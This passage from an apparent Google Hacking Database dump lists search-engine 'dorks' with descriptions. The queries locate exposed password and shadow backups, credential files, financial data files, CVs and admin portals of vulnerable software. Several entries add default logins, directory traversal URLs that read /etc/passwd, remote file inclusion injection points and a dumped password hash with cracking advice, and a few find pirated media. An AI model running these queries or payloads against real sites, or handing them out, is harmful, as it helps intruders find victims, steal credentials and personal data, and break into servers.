"http://bob:bob@www"[descr]] [[url]http://www.google.com/search?safe=off&q=%22http%3A%2F%2F*%3A*%40www%22+bob%3Abob&num=100[url]] [[dork]"http://*:*@www" bob:bob[dork]] [end][491]] [[start][492] [[title]filetype:bak inurl:"htaccess|passwd|shadow|htusers"[title]] [[descr]This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).

Every attacker knows that changing the extension of a file on a webserver can have ugly consequences.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Abak+inurl%3A%22htaccess%7Cpasswd%7Cshadow%7Chtusers%22&filter=0[url]] [[dork]filetype:bak inurl:"htaccess|passwd|shadow|htusers"[dork]] [end][492]] [[start][493] [[title]filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"[title]] [[descr]This search will show an attacker some PHP error logs which may contain information on which an attack can be based.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Alog+%22PHP+Parse+error%22+%7C+%22PHP+Warning%22+%7C+%22PHP+Error%22[url]] [[dork]filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"[dork]] [end][493]] [[start][494] [[title]"powered by CuteNews" "2003..2005 CutePHP"[title]] [[descr]This finds sites powered by various CuteNews versions. An attacker can use this list and search the online advisories for vulnerabilities.

For example: "CuteNews HTML Injection Vulnerability Via Commentaries", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22powered+by+CuteNews%22+%222003..2005+CutePHP%22&btnG=Search[url]] [[dork]"powered by CuteNews" "2003..2005 CutePHP"[dork]] [end][494]] [[start][496] [[title]intext:"404 Object Not Found" Microsoft-IIS/5.0[[title]] [[descr]This search finds IIS 5.0 error pages, i.e. IIS 5.0 servers.[descr]] [[url]http://www.google.com/search?q=intext%3A%22404+Object+Not+Found%22+Microsoft-IIS%2F5.0[url]] [[dork]intext:"404 Object Not Found" Microsoft-IIS/5.0[dork]] [end][496]] [[start][497] [[title]filetype:conf oekakibbs[[title]] [[descr]Oekakibbs is a Japanese anime creation application. The config file tells an attacker the encrypted password. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+oekakibbs+&btnG=Search[url]] [[dork]filetype:conf oekakibbs [dork]] [end][497]] [[start][498] [[title]Novell NetWare intext:"netware management portal version"[title]] [[descr]Netware servers (v5 and up) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.

After the Google results are displayed, an attacker will go to the company's base web URL and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password.[descr]] [[url]http://www.google.com/search?num=100&&q=Novell+NetWare+intext%3A%22netware+management+portal+version%22[url]] [[dork]Novell NetWare intext:"netware management portal version"[dork]] [end][498]] [[start][499] [[title]Achievo webbased project management[[title]] [[descr]Achievo is a free web-based project management tool for business environments. Achievo is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite.

More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html[descr]] [[url]http://www.google.com/search?q=inurl:%22dispatch.php%3Fatknodetype%22+%7C++inurl:class.atkdateattribute.js.php&num=100&filter=0[url]] [[dork]inurl:"dispatch.php?atknodetype" | inurl:class.atkdateattribute.js.php[dork]] [end][499]] [[start][500] [[title]intitle:"PHP Explorer" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)[[title]] [[descr]This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them).[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22PHP+Explorer%22+ext%3Aphp+%28inurl%3Aphpexplorer.php+%7C++inurl%3Alist.php+%7C+inurl%3Abrowse.php%29[url]] [[dork]intitle:"PHP Explorer" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)[dork]] [end][500]] [[start][501] [[title]"ftp://" "www.eastgame.net"[title]] [[descr]Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.

"thankyou4share" ![descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22ftp%3A%2F%2F%22+%22www.eastgame.net%22+&btnG=Google+Search[url]] [[dork]"ftp://" "www.eastgame.net" [dork]] [end][501]] [[start][503] [[title]intitle:"ITS System Information" "Please log on to the SAP System"[title]] [[descr]Frontend for SAP Internet Transaction Server webgui service. [descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22ITS+System+Information%22+%22Please+log+on+to+the+SAP+System%22[url]] [[dork]intitle:"ITS System Information" "Please log on to the SAP System"[dork]] [end][503]] [[start][504] [[title]Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream © *")[[title]] [[descr]Jetbox is a content management system (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF which I think is overrated, but I will mention it here:

http://www.securityfocus.com/bid/10858/discussion/

The file holding the password is called: "http://.../includes/general_settings.inc.php"

It does come with default passwords and that is always a security risk. The administration is available via /admin/
Username: admin, Password: admin1.[descr]] [[url]http://www.google.com/search?q=Login+(%22Powered+by+Jetbox+One+CMS+%E2%84%A2%22+%7C+%22Powered+by+Jetstream+%C2%A9+*%22)&num=100&hl=en&lr=&ie=UTF-8&safe=off&filter=0[url]] [[dork]Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream © *")[dork]] [end][504]] [[start][505] [[title]LeapFTP intitle:"index.of./" sites.ini modified[[title]] [[descr]The LeapFTP client configuration file "sites.ini" holds the login credentials for those sites in plain text. The passwords seem to be encrypted.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=LeapFTP+intitle%3A%22index.of.%2F%22+sites.ini+modified&btnG=Search[url]] [[dork]LeapFTP intitle:"index.of./" sites.ini modified[dork]] [end][505]] [[start][506] [[title]intitle:Login * Webmailer[[title]] [[descr]1&1 Webmail login portals. This is made by a German company called Internet United, active in the hosting provider area.

They have a server login product which can be found by Googling


This is all not very exciting as there have been no vulnerabilities reported on this software yet.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3ALogin+1%261+Webmailer&btnG=Google+Search[url]] [[dork]intitle:Login 1&1 Webmailer[dork]] [end][506]] [[start][507] [[title]inurl:"gs/adminlogin.aspx"[title]] [[descr]GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example:

option value="E:\GRADESPEED\DRHARMONWKELLEYELEMENTARY\|Dr H. W K. E.|101">Dr ...
[descr]] [[url]http://www.google.com/search?q=inurl%3A%22gs%2Fadminlogin.aspx%22[url]] [[dork]inurl:"gs/adminlogin.aspx"[dork]] [end][507]] [[start][508] [[title]"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"[title]] [[descr]This search gives hundreds of existing curricula vitae with names and addresses. An attacker could steal an identity if there is an SSN in the document.[descr]] [[url]http://www.google.com/search?q=%22phone++*+*+*%22+%22address+*%22+%22e-mail%22+intitle:%22curriculum+vitae%22[url]] [[dork]"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"[dork]] [end][508]] [[start][509] [[title]intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"[title]] [[descr]Search to show online Novell Groupwise web access portals. [descr]] [[url]http://www.google.com/search?q=intitle:Novell+WebAccess&ie=UTF-8&oe=UTF-8[url]] [[dork]intitle:Novell WebAccess[dork]] [end][509]] [[start][510] [[title]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[title]] [[descr]Search for phpMyAdmin installations that are configured to run the MySQL database with root privileges. [descr]] [[url]http://www.google.com/search?num=100&q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22[url]] [[dork]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[dork]] [end][510]] [[start][512] [[title]"Powered by Gallery v1.4.4"[title]] [[descr]http://www.securityfocus.com/bid/10968/discussion/

"A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.

The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.

Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. "[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Gallery+v1.4.4%22[url]] [[dork]"Powered by Gallery v1.4.4"[dork]] [end][512]] [[start][513] [[title]Quicken data files[[title]] [[descr]The QDATA.QDF file (found sometimes in zipped "QDATA" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc.

This search has only a couple of hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy to back up your data online and suggests doing so. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3AQDF+QDF[url]] [[dork]filetype:QDF QDF[dork]] [end][513]] [[start][514] [[title]"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"[title]] [[descr]This search reveals PostgreSQL servers in yet another way than we had seen before. Path information appears in the error message and sometimes database names.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Warning%3A+pg_connect%28%29%3A+Unable+to+connect+to+PostgreSQL+server%3A+FATAL%22[url]] [[dork]"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"[dork]] [end][514]] [[start][515] [[title]filetype:ini wcx_ftp[[title]] [[descr]This searches for Total Commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future.[descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Aini+wcx_ftp[url]] [[dork]filetype:ini wcx_ftp[dork]] [end][515]] [[start][517] [[title]4images Administration Control Panel[[title]] [[descr]4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel lets you easily modify your galleries.[descr]] [[url]http://www.google.com/search?&q=%224images+Administration+Control+Panel%22[url]] [[dork]"4images Administration Control Panel"[dork]] [end][517]] [[start][518] [[title]intitle:index.of /AlbumArt_[[title]] [[descr]Directories containing commercial music.
AlbumArt_{.*}.jpg files are downloaded/created by MS Windows Media Player in the music directory.[descr]] [[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3Aindex.of+%2FAlbumArt_&btnG=Google-Suche&meta=[url]] [[dork]intitle:index.of /AlbumArt_[dork]] [end][518]] [[start][519] [[title]inurl:robpoll.cgi filetype:cgi[[title]] [[descr]robpoll.cgi is used to administrate polls.
The default password used for adding polls is 'robpoll'. All of the results should look something like this: "http://www.example.com/robpoll.cgi?start". An attacker may change robpoll.cgi pointing to admin like this: "http://www.example.com/robpoll.cgi?admin".
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Arobpoll.cgi+filetype%3Acgi&btnG=Search[url]] [[dork]inurl:robpoll.cgi filetype:cgi[dork]] [end][519]] [[start][520] [[title]( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject[[title]] [[descr]Storing emails in your webtree isn't a good idea.
With this search Google will show files containing emails like mail, eml, mbox or mbx with the keywords
"password" or "subject" in the mail data.
[descr]] [[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%28+filetype%3Amail+%7C+filetype%3Aeml+%7C+filetype%3Ambox+%7C+filetype%3Ambx+%29+intext%3Apassword%7Csubject+&btnG=Google-Suche&meta=[url]] [[dork]( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject [dork]] [end][520]] [[start][521] [[title]filetype:qbb qbb[[title]] [[descr]This search will show QuickBooks backup files. QuickBooks is financial accounting software, so storing these files in a webtree is not a smart idea.


[descr]] [[url]http://www.google.com/search?&q=filetype%3Aqbb+qbb[url]] [[dork]filetype:qbb qbb[dork]] [end][521]] [[start][522] [[title]filetype:bkf bkf[[title]] [[descr]This search will show backup files for XP/2000 machines.

Of course these files could contain nearly everything, depending on the user's selection, and they can also be password protected.
[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=filetype%3Abkf+bkf&meta=[url]] [[dork]filetype:bkf bkf[dork]] [end][522]] [[start][523] [[title]inurl:"plog/register.php"[title]] [[descr]pLog is a popular form of blogging software. Currently an estimated 1450 sites are running it. The installation documents clearly warn about removing files after installation for security purposes:

"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php."

This search finds that register.php form of course :)

Below is some more general information about pLog.

Vendor site: hxxp://www.plogworld.org/
Admin portals http://sitename/plog/admin.php
Installation wizard: http://sitename/plog/wizard.php
Config file (mysql db pass): http://sitename/plog/config/config.properties.php
Temp files: http://sitename/plog/tmp/
Gallery files: http://sitename/plog/gallery/
Blog search engine: http://www.plogworld.org/ploogle/[descr]] [[url]http://www.google.com/search?q=inurl%3A%22plog%2Fregister.php%22[url]] [[dork]inurl:"plog/register.php"[dork]] [end][523]] [[start][524] [[title]link:http://www.toastforums.com/[[title]] [[descr]Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):

-- start quote --
2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name.
-- end quote --

This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table "tstdb_Member". It looks like this:

"ID" "FName" "LName" "Username" "Password" "Email" "HideEmail" "ICQ" "Homepage" "Signature" "IP" "Skin" "IncludeSignature" "NotifyDefault" "PostCount" "LastLoginDate" "LastPostDate"

Passwords are encrypted with the RC4 algorithm, so an attacker would find cracking them (more) difficult (than usual).
[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=link%3Ahttp%3A%2F%2Fwww.toastforums.com%2F&btnG=Google+Search[url]] [[dork]link:http://www.toastforums.com/[dork]] [end][524]] [[start][525] [[title]Snitz! forums db path error[[title]] [[descr]Snitz Forums uses a Microsoft Access database for storage and the default name is "Snitz_forums_2000.mdb". The installation recommends changing both the name and the path. If only one is changed this database error occurs.

An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads.[descr]] [[url]http://www.google.com/search?q=databasetype.+Code+:+80004005.+Error+Description+:&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N[url]] [[dork]databasetype. Code : 80004005. Error Description :[dork]] [end][525]] [[start][526] [[title]"Powered by Ikonboard 3.1.1"[title]] [[descr]IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.

There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.

More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.html

The bug was fixed in 3.1.2.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Ikonboard+3.1.1%22[url]] [[dork]"Powered by Ikonboard 3.1.1"[dork]] [end][526]] [[start][527] [[title]inurl:snitz_forums_2000.mdb[[title]] [[descr]The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says: "it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name."

Of course, we know readme's are for lamers.. right admins ?

[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERS

MEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]
1,1,"adminadmin","58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e","yourmail@server.com"," "," ","","",1,1,1,3," "," "," ","20030918120147",2,"20030918120207","20030918120224","Forum Admin","10.xx.xx.72",0,0,1,"000.000.000.000","","","","","","","","","","",""," "," ","",""," ","","","","",1

(data xx'd at some points)

The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simple Perl or C program.

http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt[descr]] [[url]http://www.google.com/search?q=inurl%3Asnitz_forums_2000.mdb[url]] [[dork]inurl:snitz_forums_2000.mdb[dork]] [end][527]] [[start][528] [[title]WebAPP directory traversal[[title]] [[descr]WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerability:

http:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00
http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00

Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txt
Credit goes to PhTeam for discovering this vulnerability.[descr]] [[url]http://www.google.com/search?num=100&q=inurl%3A%2Fcgi-bin%2Findex.cgi+inurl%3Atopics+inurl%3Aviewcat%3D+%2Bintext%3A%22WebAPP%22+-site%3Aweb-app.org[url]] [[dork]inurl:/cgi-bin/index.cgi inurl:topics inurl:viewcat= +intext:"WebAPP" -site:web-app.org[dork]] [end][528]] [[start][529] [[title]filetype:rdp rdp[[title]] [[descr]These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another Windows computer using the RDP protocol.[descr]] [[url]http://www.google.com/search?q=filetype%3Ardp+rdp[url]] [[dork]filetype:rdp rdp[dork]] [end][529]] [[start][530] [[title]filetype:reg "Terminal Server Client"[title]] [[descr]These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses. [descr]] [[url]http://www.google.com/search?q=filetype%3Areg+%22Terminal+Server+Client%22[url]] [[dork]filetype:reg "Terminal Server Client"[dork]] [end][530]] [[start][531] [[title]inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"[title]] [[descr]Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.

Web crackers are a distinct breed, and many are not comfortable with the draconian measures that many other crackers take, such as port and service scanning; the modern web cracker finds such tactics much too intrusive. This leaves the web cracker with public proxy lists as the only viable option for coming into contact with a large number of proxies. These are of course very slow, and very very unstable, and do not allow the cracker much time between his proxy runs.

Luckily google gives them another option, if they are smart enough to find it.

CGI-proxy ( http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the imprudent few who leave it open can quickly be separated from the wise masses.

CGI-proxy's default page contains the text, as you can see in the demo on their site:

"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine."

The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:

inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"

More results can be obtained by omitting the "inurl:nph-proxy.cgi" constraint, but much more trash is generated as well.[descr]] [[url]http://www.google.com/search?q=inurl:%22nph-proxy.cgi%22+%22Start+browsing+through+this+CGI-based+proxy%22&hl=en&lr=&ie=UTF-8&filter=0[url]] [[dork]inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"[dork]] [end][531]] [[start][532] [[title]intitle:"Index of *" inurl:"my shared folder" size modified[[title]] [[descr]These are index pages of "My Shared Folder". Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of+*%22+inurl%3A%22my+shared+folder%22+size+modified&btnG=Search[url]] [[dork]intitle:"Index of *" inurl:"my shared folder" size modified[dork]] [end][532]] [[start][533] [[title]E-market remote code execution[[title]] [[descr]E-market is commercial software made by a Korean company (http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:

http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]
http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]

For more information read this:
http://echo.or.id/adv/adv06-y3dips-2004.txt
Author: y3dips
Date: Sept, 7th 2004
Location: Indonesian, Jakarta[descr]] [[url]http://www.google.com/search?q=inurl%3A%22%2Fbecommunity%2Fcommunity%2Findex.php%3Fpageurl%3D%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8[url]] [[dork]inurl:"/becommunity/community/index.php?pageurl="[dork]] [end][533]] [[start][534] [[title]filetype:pot inurl:john.pot[[title]] [[descr]John the Ripper is a popular cracking program every hacker knows. Its results are stored in a file called john.pot.

This search finds such results files, currently only one. Also no results for the distributed john version (djohn.pot) today :)

PS: This was posted to the "fun" forum, so don't take this too seriously ![descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apot+inurl%3Ajohn.pot+&btnG=Google+Search[url]] [[dork]filetype:pot inurl:john.pot [dork]] [end][534]] [[start][543] [[title]Gallery configuration setup files[[title]] [[descr]Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.

We call it Gallery in Setup mode :)[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Agallery+inurl%3Asetup+%22Gallery+configuration%22&btnG=Search[url]] [[dork]intitle:gallery inurl:setup "Gallery configuration"[dork]] [end][543]] [[start][544] [[title]filetype:xls inurl:"email.xls"[title]] [[descr]Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses.

[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+inurl%3A%22email.xls%22+&btnG=Search[url]] [[dork]filetype:xls inurl:"email.xls" [dork]] [end][544]] [[start][545] [[title]filetype:xls inurl:"password.xls"[title]] [[descr]Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds passwords. Think of this as a generic search, change the filetype or add keywords to get more specific.. you know what to do..[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+inurl%3A%22password.xls%22+&btnG=Search[url]] [[dork]filetype:xls inurl:"password.xls" [dork]] [end][545]] [[start][546] [[title]filetype:pdb pdb backup (Pilot | Pluckerdb)[[title]] [[descr]Hotsync database files can be found using

"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your "x:\palm\{username}\backup"

The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).

Currently we don't know of a program to "read" these binary files.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apdb+pdb+backup+%28Pilot+%7C+Pluckerdb%29+&btnG=Google+Search[url]] [[dork]filetype:pdb pdb backup (Pilot | Pluckerdb) [dork]] [end][546]] [[start][547] [[title]filetype:pl "Download: SuSE Linux Openexchange Server CA"[title]] [[descr]This search will get you to the web administration portal of Linux Openexchange servers.[descr]] [[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=filetype%3Apl+%22Download%3A+SuSE+Linux+Openexchange+Server+CA%22+%0D%0A+%0D%0A&btnG=Google-Suche&meta=[url]] [[dork]filetype:pl "Download: SuSE Linux Openexchange Server CA" [dork]] [end][547]] [[start][548] [[title]intitle:"dreambox web"[title]] [[descr]This search will show web administration interfaces of Linux Dreamboxes.

The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc. [descr]] [[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3A%22dreambox+web%22+&btnG=Google-Suche&meta=[url]] [[dork]intitle:"dreambox web" [dork]] [end][548]] [[start][549] [[title]PHP-Nuke - create super user right now ![[title]] [[descr]PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:

"Welcome to PHP-Nuke!

Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE."[descr]] [[url]http://www.google.com/search?q=%22create+the+Super+User%22+%22now+by+clicking+here%22[url]] [[dork]"create the Super User" "now by clicking here"[dork]] [end][549]] [[start][550] [[title]filetype:asp DBQ=" * Server.MapPath("*.mdb")[[title]] [[descr]This search finds sites using Microsoft Access databases, by looking for the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse.[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Aasp+DBQ%3D%22+%26+Server.MapPath%28%22*.mdb%22%29[url]] [[dork]filetype:asp DBQ=" & Server.MapPath("*.mdb")[dork]] [end][550]] [[start][551] [[title]intitle:"TUTOS Login"[title]] [[descr]TUTOS stands for "The Ultimate Team Organization Software." This search finds the login portals to TUTOS.

Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when you're logged in. This is unconfirmed as of now.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22TUTOS+Login%22[url]] [[dork]intitle:"TUTOS Login"[dork]] [end][551]] [[start][552] [[title]"Login to Usermin" inurl:20000[[title]] [[descr]Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Login+to+Usermin%22+inurl%3A20000[url]] [[dork]"Login to Usermin" inurl:20000[dork]] [end][552]] [[start][553] [[title]"Powered by AutoIndex PHP Script"[title]] [[descr]AutoIndex is a PHP script that makes a table that lists the files in a directory, and lets users access the files and subdirectories. It includes searching, icons for each file type, an admin panel, uploads, access logging, file descriptions, and more.[descr]] [[url]http://www.google.com/search?q=%22Powered+by+AutoIndex+PHP+Script%22[url]] [[dork]"Powered by AutoIndex PHP Script"[dork]] [end][553]] [[start][554] [[title]filetype:lit lit (books|ebooks)[[title]] [[descr]Tired of web searching? Want something to read? You can find ebooks (thousands of them) with this search. LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)

[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Alit+lit+%28books%7Cebooks%29[url]] [[dork]filetype:lit lit (books|ebooks)[dork]] [end][554]] [[start][555] [[title]"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")[[title]] [[descr]DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.

More: http://www.securityfocus.com/bid/11086/discussion/

[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+*%3A+newtelligence%22+%28%22dasBlog+1.6%22%7C+%22dasBlog+1.5%22%7C+%22dasBlog+1.4%22%7C%22dasBlog+1.3%22%29&btnG=Search[url]] [[dork]"Powered *: newtelligence" ("dasBlog 1.6"| "dasBlog 1.5"| "dasBlog 1.4"|"dasBlog 1.3")[dork]] [end][555]] [[start][556] [[title]Lotus Domino address books[[title]] [[descr]This search will return any Lotus Domino address books which may be open to the public. These can contain a lot of detailed personal info you don't want to fall into the hands of your competitors or hackers. Most of them are password protected.[descr]] [[url]http://www.google.com/search?num=100&q=inurl%3A%22%2Fnames.nsf%3FOpenDatabase%22+-inurl%3Agov[url]] [[dork]inurl:"/names.nsf?OpenDatabase" -inurl:gov[dork]] [end][556]] [[start][557] [[title]intitle:"Login - powered by Easy File Sharing Web Server"[title]] [[descr]Easy File Sharing Web Server is file sharing software that allows visitors to upload/download files easily through a web browser (IE, Netscape, Opera etc.). More information at: http://www.securityfocus.com/bid/11034/discussion/

An attacker can reportedly bypass the authentication by entering the name of the virtual folder directly.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3A%22Login+-+powered+by+Easy+File+Sharing+Web+Server%22+&btnG=Google+Search[url]] [[dork]intitle:"Login - powered by Easy File Sharing Web Server" [dork]] [end][557]] [[start][558] [[title]intitle:"Tomcat Server Administration"[title]] [[descr]This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Tomcat+Server+Administration%22[url]] [[dork]intitle:"Tomcat Server Administration"[dork]] [end][558]] [[start][559] [[title]ez Publish administration[[title]] [[descr]Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.

Vendor site: http://www.ez.no/
Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodified

Depending on the version, two queries can be used:

Admin intitle:"eZ publish administration"
intitle:"Login" "Welcome to eZ publish administration"

Cross-site scripting, information disclosure and path disclosure vulnerabilities exist in older versions.
